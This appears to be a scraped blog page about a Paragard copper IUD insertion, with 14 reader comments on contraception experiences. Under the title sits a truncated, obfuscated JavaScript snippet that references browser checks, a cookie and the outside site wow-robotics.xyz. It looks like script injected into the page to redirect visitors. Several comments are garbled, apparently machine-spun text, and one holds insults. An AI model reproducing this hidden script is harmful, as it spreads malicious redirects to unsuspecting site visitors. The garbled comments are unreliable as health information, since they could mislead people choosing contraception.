Paragard IUD insertion follow-up

var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','se...



14 Responses to “Paragard IUD insertion follow-up”

  1. greenappleeyecandy says:

    Brainwashing? funny how it’s 2013 and there is still a stigma attached to women open the. their personal experiences with methods of contraception If you have a problem with the woman on birth control, then perhaps men should with vasectomy. It is a reversible process. Problem solved.

  2. TinkaLee82 says:

    Ive got the Paraguard as well. I’ve had mine for 5 months. I like this I.U.D. Ive tried before the marena IUD as well as 2 years. I had a lot of problems with this. But im really glad that I Paraguard 🙂 (hormone-free)

  3. papercandles says:

    How did you like ortho tri cyclen lo? I consider myself to this pill or Paraguard.

  4. AxHeathen says:

    I just got a Paragard IUD today. I guess women their experiences on YouTube, so thank you 🙂

  5. badd25 says:

    I hate this birth control

  6. Jessica Manzano says:

    Brainwashed? If you look at the following videos – you would see that I had it removed 10 months later. I’m not trying to sell it, just to let people know what my experience was. Thank you.

  7. artistenoire says:

    Lol, pxmstr, bitch, get a fucking life. This guy commented my video with nonsense, too. Thanks for your video, gurl!

  8. pxmstr says:

    this girl is brainwashed already

  9. 07inolvidable14 says:

    it may not, but I have really bad cramps when I had my period ..

  10. Marisol Flores says:

    Can you feel it, during sex partner?

  11. Alexis G says:

    you have to have had to have a child before Paragard?

  12. 07inolvidable14 says:

    Can some grls here && tell me how this uid Paraguard not help to gain weight? PLEASE I ask because u took the pill && depo & gain much weight thank u!

  13. Twila Mclean says:

    Please see my video, I was pregnant with the IUD Paraguard

  14. 26sharris says:

    that’s so true what they I have the ParaGard and has worked for me, but I find that my period is changed from 3 days to 8 days, and just started month ago.Some said it could b menopause, but I ‘m only 36 years old, young. I think I’ll make dr.appt to be sure.

Leave a Reply